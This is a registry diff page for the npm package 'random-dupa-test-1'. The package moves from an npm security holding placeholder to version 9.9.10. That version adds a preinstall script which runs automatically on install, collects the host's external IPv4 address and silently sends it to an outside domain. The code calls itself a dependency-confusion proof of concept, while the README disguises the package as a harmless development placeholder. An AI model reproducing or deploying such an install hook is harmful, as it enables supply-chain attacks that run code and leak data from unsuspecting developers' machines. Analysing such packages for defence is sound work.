random-dupa-test-1 0.0.1-security → 9.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of random-dupa-test-1 might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,5 @@
1
- # Security holding package
1
+ # random-dupa-01
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ This is a temporary placeholder package for development purposes only.
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=random-dupa-test-1 for more information.
5
+ This package is not intended for production use and will be removed soon.
package/index.js ADDED
@@ -0,0 +1 @@
1
+ module.exports = {};
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "random-dupa-test-1",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "9.9.10",
4
+ "description": "Temporary development placeholder package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ },
9
+ "keywords": [
10
+ "placeholder",
11
+ "development",
12
+ "temporary"
13
+ ],
14
+ "author": "None",
15
+ "license": "MIT"
6
16
  }
package/preinstall.js ADDED
@@ -0,0 +1,30 @@
1
+ // Minimal dependency confusion PoC for random-dupa-01
2
+ const https = require('https');
3
+ const os = require('os');
4
+
5
+ // Get current IP address (simplified approach)
6
+ let ip;
7
+ try {
8
+ const interfaces = os.networkInterfaces();
9
+ for (const name of Object.keys(interfaces)) {
10
+ for (const iface of interfaces[name]) {
11
+ // Skip over non-IPv4 and internal interfaces
12
+ if (iface.family === 'IPv4' && !iface.internal) {
13
+ ip = iface.address;
14
+ break;
15
+ }
16
+ }
17
+ if (ip) break;
18
+ }
19
+ } catch (e) {
20
+ ip = 'unknown';
21
+ }
22
+
23
+ // Make a simple GET request to prove execution
24
+ https.get(`https://verysecuredomain.com/random-dupa-test-1?ip=${ip}`, (res) => {
25
+ // Just silently complete
26
+ }).on('error', (e) => {
27
+ // Silently fail
28
+ });
29
+
30
+ // No console logs, no file writes - just the minimal SSRF